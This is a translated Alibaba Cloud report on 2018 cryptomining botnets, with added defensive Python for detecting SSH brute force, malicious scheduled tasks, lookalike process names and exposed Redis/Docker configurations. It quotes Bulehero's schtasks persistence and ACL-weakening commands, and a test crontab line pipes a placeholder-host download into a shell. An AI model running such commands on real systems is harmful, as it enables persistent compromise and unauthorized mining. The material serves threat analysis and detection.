2018 Cloud Mining Analysis Report

Recently, the Alibaba Cloud Security Team released the "2018 Cloud Mining Analysis Report". Based on Alibaba Cloud's 2018 attack and defense data, the report analyzed the malicious mining situation and put forward reasonable security protection suggestions for individuals and enterprises.

The report pointed out that although the price of cryptocurrencies experienced a sharp drop in 2018, mining is still the most direct means for cyber criminal gangs to realize their profits after invading servers. More and more 0-Day/N-Day vulnerabilities are used for intrusion and mining within a very short time after being announced. The trend of criminal gangs using vulnerabilities to launch attacks for mining will continue.

1. Attack Situation Analysis

1. Hot 0-Day/N-Day vulnerability exploits have become the "arsenal" of mining gangs, and the window period for users to fix 0-Day vulnerabilities has become shorter.

In 2018, a number of widely used web applications exposed high-risk vulnerabilities, posing a serious threat to Internet security. Afterwards, the security community analyzed the vulnerability information and shared the vulnerability details, making it easy to obtain the exploit code from the Internet. Mining gangs will naturally not let go of these readily available "arsenals". In addition, some N-Day vulnerabilities that have not been widely fixed are often exploited by mining gangs. This report sorts out some hot 0-Day/N-Day vulnerabilities that have been widely exploited by mining gangs.

At the same time, Alibaba Cloud has observed that the interval between the disclosure of a 0-Day vulnerability and its large-scale exploitation is getting shorter and shorter. Therefore, users who fail to fix high-risk 0-Day vulnerabilities promptly after they are exposed are likely to become victims of malicious mining.

2. Non-web network applications exposed to the public network have become a major target for mining gangs

Enterprises have paid enough attention to the security threats that web applications may cause. Security products such as WAF, RASP, and vulnerability scanning have also improved the security level of web applications. However, non-web network applications (Redis, Hadoop, SQLServer, etc.) are often not core applications of enterprises. Enterprises do not invest as much in security reinforcement and vulnerability repair as web applications, which often leads to high-risk vulnerabilities that continue to remain unrepaired. Therefore, mining gangs will also take targeted advantage of these persistent weak applications on the Internet. This report sorts out the timeline of non-web network application vulnerabilities being exploited by mining gangs in 2018.

3. Mining gangs widely use brute force to spread, and weak passwords are still the main threat facing the Internet

The following figure shows the percentage of different applications that have been hacked into and used for mining. It can be seen that SSH/RDP/SQLServer are the key applications used for mining, and these applications are usually hacked and infected with mining viruses because of weak passwords being cracked by brute force. This shows that identity authentication problems caused by weak passwords are still an important threat facing the Internet.
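The brute-force pattern described above leaves a clear trace in authentication logs: a burst of failed logins from one source address, often followed by a password success from the same address once the weak credential is guessed. The following is an added example (not part of the report or of Alibaba Cloud's tooling) that detects this pattern in sshd log lines. The log lines are constructed for the example and use documentation IP ranges; the syslog timestamp carries no year, so the year is an assumed parameter.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines (not from the report). One burst of failed
# password attempts from 203.0.113.5 ends with a successful password login.
SAMPLE_AUTH_LOG = """\
Dec 10 03:14:01 host1 sshd[2011]: Failed password for root from 203.0.113.5 port 51022 ssh2
Dec 10 03:14:02 host1 sshd[2011]: Failed password for root from 203.0.113.5 port 51023 ssh2
Dec 10 03:14:03 host1 sshd[2011]: Failed password for invalid user admin from 203.0.113.5 port 51024 ssh2
Dec 10 03:14:04 host1 sshd[2011]: Failed password for root from 203.0.113.5 port 51025 ssh2
Dec 10 03:14:05 host1 sshd[2011]: Failed password for root from 203.0.113.5 port 51026 ssh2
Dec 10 03:14:06 host1 sshd[2011]: Accepted password for root from 203.0.113.5 port 51027 ssh2
Dec 10 03:20:00 host1 sshd[2099]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Dec 10 03:45:00 host1 sshd[2150]: Accepted publickey for alice from 198.51.100.7 port 40001 ssh2
"""

# Matches the standard sshd "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2018):
    """Parse one sshd line into a dict, or return None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # year is assumed
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2018):
    """Flag source IPs with >= threshold failed logins inside any window_seconds window.

    Each alert also records whether a *password* login from the same IP succeeded
    at or after the end of the burst, which is the signature of a guessed credential.
    """
    events = [e for e in (parse_line(l, year) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        # Sliding window over the sorted failures: widest run that fits in the window.
        max_in_window, start = 0, 0
        for end in range(len(fails)):
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            max_in_window = max(max_in_window, end - start + 1)
        if max_in_window >= threshold:
            last_fail_ts = fails[-1]["ts"]
            success_after = any(e["result"] == "Accepted" and e["method"] == "password"
                                and e["ts"] >= last_fail_ts for e in evs)
            alerts.append({"ip": ip, "failures": max_in_window,
                           "success_after_burst": success_after})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

Running it against the sample flags 203.0.113.5 with five failures in a minute and a password success right after, while the single failure from 198.51.100.7 stays below the threshold. The same window-count logic applies to RDP (Windows event 4625) or SQL Server (error 18456) logs once the parser is swapped; a success-after-burst alert is the one that should trigger an incident rather than just a firewall block.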

2. Malicious Behavior

1. Mining backdoors are commonly spread through worms

After infecting victim hosts with mining Trojans, most mining gangs will control these victim hosts to scan and attack other hosts on the local network and the Internet, thereby expanding the number of infections. These mining Trojans spread quickly and are difficult to eradicate on the Internet, because once a small number of hosts are infected with malicious programs, they will be controlled to attack other hosts, causing other hosts with vulnerabilities or configuration problems to quickly fall.

A small number of mining gangs will directly control some hosts to carry out network attacks. After invading the victim host, they will only implant a mining backdoor in the host and will not spread it further. The most representative one is the 8220 mining gang. This type of gang generally has a rich variety of vulnerability exploitation methods and a fast vulnerability update speed.

2. Mining gangs will maximize their profits by persisting on the victim host

Most mining gangs will try to persist on the victim host to obtain maximum benefits.

Usually on Linux systems, mining gangs use crontab to set up periodically executed commands. On Windows systems, mining gangs usually use schtasks and WMI to achieve persistence.

The following are the schtasks commands that the Bulehero Trojan executes to add periodic tasks (one running its downloader every minute, one resetting the file's ACL so that Everyone has full control):

    cmd /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c C:\Windows\ime\scvsots.exe"
    cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F"
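Both persistence mechanisms mentioned above (crontab on Linux, scheduled tasks on Windows) can be audited from their own listings. The following is an added example, not code from the report, that scores crontab entries and the CSV output of `schtasks /query /fo CSV /v` against a few heuristics matching the Bulehero behaviour: a one-minute repeat interval, a binary outside the normal system directories, a download piped straight into a shell, and an ACL command that grants Everyone full control. The sample inputs are constructed; the column names "TaskName", "Task To Run", "Schedule Type", "Repeat: Every" and "Run As User" are assumed to match the verbose CSV output, and the download URL is a placeholder.

```python
import csv
import io
import re

# Constructed sample crontab (not from the report). The URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/1 * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER.invalid/i.sh | sh
0 2 * * * /usr/local/bin/backup.sh
* * * * * /tmp/.X11-unix/kworkerd
"""

# Constructed sample of `schtasks /query /fo CSV /v`, reduced to the columns used here
# (assumed column names). The first two rows mirror the Bulehero commands above.
SAMPLE_SCHTASKS_CSV = r'''"TaskName","Task To Run","Schedule Type","Repeat: Every","Run As User"
"\Miscfost","cmd /c C:\Windows\ime\scvsots.exe","One Time Only, Minute","0:01:00","SYSTEM"
"\Netframework","cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F","One Time Only, Minute","0:01:00","SYSTEM"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","Weekly","N/A","SYSTEM"
'''

SUSPICIOUS_DIRS_LINUX = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOAD_PIPE_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")

WINDOWS_TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                        "%windir%\\system32\\", "c:\\program files")
ACL_WEAKEN_RE = re.compile(r"\b(cacls|icacls)\b.*everyone:?F", re.IGNORECASE)
EXE_RE = re.compile(r'([a-z]:\\[^\s"]+\.exe|%windir%\\[^\s"]+\.exe)', re.IGNORECASE)


def audit_crontab(text):
    """Return suspicious crontab entries with the reasons they were flagged."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)          # five schedule fields + command
        if len(parts) < 6:
            continue
        schedule, command = parts[:5], parts[5]
        reasons = []
        if schedule[0] in ("*", "*/1"):
            reasons.append("runs every minute")
        if DOWNLOAD_PIPE_RE.search(command):
            reasons.append("downloads and pipes to shell")
        if any(d in command for d in SUSPICIOUS_DIRS_LINUX):
            reasons.append("executes from world-writable directory")
        if reasons:
            findings.append({"entry": line, "reasons": reasons})
    return findings


def repeat_seconds(value):
    """Convert a 'H:MM:SS' repeat interval to seconds; 'N/A' and blanks give None."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", value.strip())
    if not m:
        return None
    h, mi, s = map(int, m.groups())
    return h * 3600 + mi * 60 + s


def audit_schtasks_csv(text, max_repeat_seconds=300):
    """Return suspicious scheduled tasks from verbose schtasks CSV output."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        cmd = row.get("Task To Run", "")
        reasons = []
        rep = repeat_seconds(row.get("Repeat: Every", ""))
        if rep is not None and rep <= max_repeat_seconds:
            reasons.append(f"repeats every {rep}s")
        exe = EXE_RE.search(cmd)
        if exe and not exe.group(1).lower().startswith(WINDOWS_TRUSTED_DIRS):
            reasons.append(f"runs binary outside trusted directories: {exe.group(1)}")
        if ACL_WEAKEN_RE.search(cmd):
            reasons.append("grants Everyone full control on a file")
        if reasons:
            findings.append({"task": row.get("TaskName", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_schtasks_csv(SAMPLE_SCHTASKS_CSV):
        print(f)
```

On the sample input the backup job and the built-in defrag task pass, while the two Bulehero tasks and both malicious cron entries are reported with their reasons. In practice the crontab text comes from `crontab -l` for each user plus the files under /etc/cron.d, and the task listing from `schtasks /query /fo CSV /v`; the thresholds are deliberately loose so that a short, reviewable list is produced rather than a verdict.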

3. Mining gangs will evade security analysis and tracing by disguising processes, adding shells, obfuscating codes, setting up private mining pools or proxies, etc.

The virus downloader process used by the Bulehero mining network is named scvsots.exe, which is very similar to the name of a normal Windows program, svchost.exe. Other botnets also use malicious program names that resemble normal programs, such as taskhsot.exe, taskmgr.exe, and java.
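Names like scvsots.exe and taskhsot.exe are chosen to be skimmed past in a process list, and names like taskmgr.exe and java are legitimate but running from the wrong place. The following is an added example (not from the report) that classifies a process image path two ways: a known system process name is checked against its expected directory, and an unknown name is compared with the allowlist using optimal string alignment distance (Levenshtein plus adjacent transpositions). The allowlist and expected directories are constructed for the example; the distance threshold of 3 is chosen because that is the distance between scvsots.exe and svchost.exe.

```python
# Expected directories for a short allowlist of Windows system processes.
# Constructed for this example; extend it from your own golden-image baseline.
KNOWN_PROCESSES = {
    "svchost.exe": "c:\\windows\\system32\\",
    "taskhost.exe": "c:\\windows\\system32\\",
    "taskmgr.exe": "c:\\windows\\system32\\",
    "csrss.exe": "c:\\windows\\system32\\",
    "lsass.exe": "c:\\windows\\system32\\",
    "services.exe": "c:\\windows\\system32\\",
    "winlogon.exe": "c:\\windows\\system32\\",
    "explorer.exe": "c:\\windows\\",
}


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus single adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def classify_process(image_path, max_distance=3):
    """Return (verdict, related_name) for a full process image path.

    verdict is one of: "ok", "wrong-path" (real name, unexpected directory),
    "lookalike" (unknown name within max_distance of a known one), "unknown".
    """
    path = image_path.lower()
    directory, _, name = path.rpartition("\\")
    directory += "\\"
    if name in KNOWN_PROCESSES:
        if directory == KNOWN_PROCESSES[name]:
            return ("ok", None)
        return ("wrong-path", name)
    best = min(KNOWN_PROCESSES, key=lambda known: osa_distance(name, known))
    if osa_distance(name, best) <= max_distance:
        return ("lookalike", best)
    return ("unknown", None)


if __name__ == "__main__":
    for p in (r"C:\Windows\ime\scvsots.exe", r"C:\Users\Public\taskhsot.exe",
              r"C:\Users\Public\taskmgr.exe", r"C:\Windows\System32\svchost.exe"):
        print(p, "->", classify_process(p))
```

The wrong-path check is the more reliable of the two and costs nothing; the lookalike check is a triage aid, since with a threshold of 3 very short benign names can land near an allowlisted one and need a human look. On Windows the image paths can be fed in from `Get-Process | Select-Object Path` or from Sysmon event 1.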

During the analysis of the mining botnets, we found that most backdoor binaries were packed. The most commonly used packers on Windows are UPX, VMP, and sfxrar. As shown in the figure below, almost every malicious program used by RDPMiner is packed with one of these three.

In addition, the malicious scripts used by mining gangs are often obfuscated in various ways. As shown in the figure below, the JBossMiner mining botnet uses obfuscation and encryption in its vbs malicious script.

Although manual analysis can deobfuscate or decrypt these scripts through a variety of means, encryption and obfuscation remain very effective for evading antivirus software.

Malicious mining groups use their own wallet addresses to connect to public mining pools, which may be blocked due to complaints received by the mining pools. Mining groups tend to use mining pool proxies or private mining pools to mine. As a result, it is difficult for security researchers to estimate the number and scale of compromised hosts through the hashrate and payment history published by the mining pools.

3. Overview of mainstream gangs

1. DDG mining gang

Since it was first exposed at the end of 2017, the DDG mining botnet has maintained a very high level of activity. Its main malicious program is written in the Go language, which objectively creates certain obstacles for security personnel to study and analyze. Frequent program configuration changes and technical upgrades make it the most harmful mining botnet in 2018.

DDG (3019) module structure and function

2. 8220 mining group

Among many mining botnets, the mining Trojan of the 8220 group is unique because it does not use a worm-like method to spread, but directly exploits vulnerabilities.

In theory, this method spreads more slowly and is harder to sustain than botnets that spread through worm-like methods. However, the 8220 mining gang still achieved a large number of infections this way.

Mining network structure

3. Mykings (theHidden) mining gang

The Mykings (also known as theHidden) mining network was reported by several peer security companies in mid-2017. It has existed since 2014, and the botnet is still active today, which shows remarkable staying power. The botnet is extremely complex and integrates the functions of malicious programs such as Mirai and Masscan. In addition, heavy encryption and obfuscation are used in the payload and BypassUAC components to conceal the attack intentions and evade detection by security software and analysis by security researchers. At the end of November, the mining botnet was found to have joined forces with "Dark Cloud", and its harm has increased again.

Mining network structure

4. Bulehero mining gang

Mining network structure

5. RDPMiner mining group

The mining botnet began to spread in October 2018 and has since changed the name of its mining program several times.

Mining network structure

6. JbossMiner mining group

In March 2018, Alibaba Cloud Security Team reported that it had captured a JbossMiner malicious program sample from a honeypot. The sample was packaged with py2exe, and after unpacking and decompilation, it turned out to be a complete attack program written in Python, including dozens of files such as source code and dependent libraries. There are different exploits for Windows and Linux victim hosts.

Mining network structure

7. WannaMine

WannaMine is a worm-type botnet. The mining gang's strategy was once described by CrowdStrike as "living off the land", because the malicious program on an infected host first tries to log in to other hosts using credentials collected by Mimikatz, and only after that fails does it attack and propagate to other hosts with the "EternalBlue" vulnerability.

Mining network structure

8. Kworkerd

This is a mining botnet that mainly attacks the unauthorized access vulnerability of the Redis database. It is named because it disguises the name of the mining program as the normal Linux process Kworkerd.

This Trojan only exploits one vulnerability but still causes a lot of infections, which shows that database security configuration needs to be taken seriously by users.

9. DockerKiller

As the popularity of microservices continues to rise, more and more companies are choosing containers to deploy their applications. However, as the preferred container for implementing microservices, Docker has not received enough attention for its security during large-scale deployment. In August 2018, unauthorized access vulnerabilities caused by improper Docker configuration were exploited in large quantities by mining gangs.

Mining network structure
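Both Kworkerd and DockerKiller above depend on a single misconfiguration: a Redis instance or a Docker daemon API reachable from the network with no authentication. The following is an added example (not from the report) that audits a redis.conf fragment and a Docker daemon.json for exactly those conditions, and shows a weak configuration beside a hardened one. All configuration samples are constructed; the requirepass value and the TLS certificate paths are placeholders.

```python
import json

# Constructed weak redis.conf: listens on every interface, protected-mode off, no password.
WEAK_REDIS_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed hardened redis.conf: loopback only, protected-mode on, password required,
# and the CONFIG command renamed away so a client cannot rewrite the data directory.
HARDENED_REDIS_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-PLACEHOLDER-PASSWORD
rename-command CONFIG ""
"""

# Constructed daemon.json samples. The weak one exposes the Docker API on TCP with no TLS;
# the hardened one keeps TCP but requires client certificates (paths are placeholders).
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of values it was given."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        settings.setdefault(key.lower(), []).append(value.strip())
    return settings


def audit_redis_conf(text):
    """Return a list of exposure findings for a redis.conf fragment."""
    settings = parse_redis_conf(text)
    findings = []
    bind_addrs = " ".join(settings.get("bind", [])).split()
    if not bind_addrs or any(a in ("0.0.0.0", "*", "::") for a in bind_addrs):
        findings.append("listens on all interfaces (no bind directive, or bind 0.0.0.0)")
    if settings.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode disabled")
    password = settings.get("requirepass", [""])[0].strip('"')
    if not password:
        findings.append("no requirepass: unauthenticated access")
    return findings


def audit_docker_daemon(text):
    """Return a list of exposure findings for a daemon.json document."""
    cfg = json.loads(text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts and not cfg.get("tlsverify", False):
        findings.append(f"Docker API exposed over TCP without TLS client verification: {tcp_hosts}")
    return findings


if __name__ == "__main__":
    print("weak redis:", audit_redis_conf(WEAK_REDIS_CONF))
    print("hardened redis:", audit_redis_conf(HARDENED_REDIS_CONF))
    print("weak docker:", audit_docker_daemon(WEAK_DAEMON_JSON))
    print("hardened docker:", audit_docker_daemon(HARDENED_DAEMON_JSON))
```

The weak Redis sample produces three findings and the weak Docker sample one; both hardened samples are clean. The audit is intentionally conservative: a missing bind directive is treated as all-interfaces because that is the default, and even with tlsverify set the TCP listener is still only as strong as the CA that issues client certificates, so a host firewall in front of 2376 remains good practice.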

4. Security Recommendations

Although cryptocurrency prices are low now, the economy is under downward pressure, which may provide incentives for potential criminal activity. Alibaba Cloud predicts that the volume of mining activity will remain high in 2019; and as knowledge of mining and vulnerability exploitation becomes more widespread, the number of malicious mining actors may stabilize with a small increase.

Based on this situation, the Alibaba Cloud Security Team provides the following security recommendations for enterprises and individuals:

The weakest link in a security system is people, and the biggest security problems are often caused by people's laziness. As a result, weak passwords and brute-force cracking account for half of the causes of mining infections. Whether for a company or an individual, security awareness education is essential;

The window period for 0-Day vulnerability repair is getting shorter and shorter. Enterprises need to improve the efficiency of vulnerability emergency response. On the one hand, they should actively update application systems, and on the other hand, they should pay attention to product security announcements and upgrade them in a timely manner. At the same time, they can also choose to purchase security hosting services to improve their own security level.

With the convenience brought by the elastic computing resources on the cloud, the risk of exposure of some non-Web network applications has also increased. Security operation and maintenance personnel should focus on the security risks associated with non-Web applications, or choose to purchase firewall products with IPS functions to provide protection for 0-Day vulnerabilities as soon as possible.
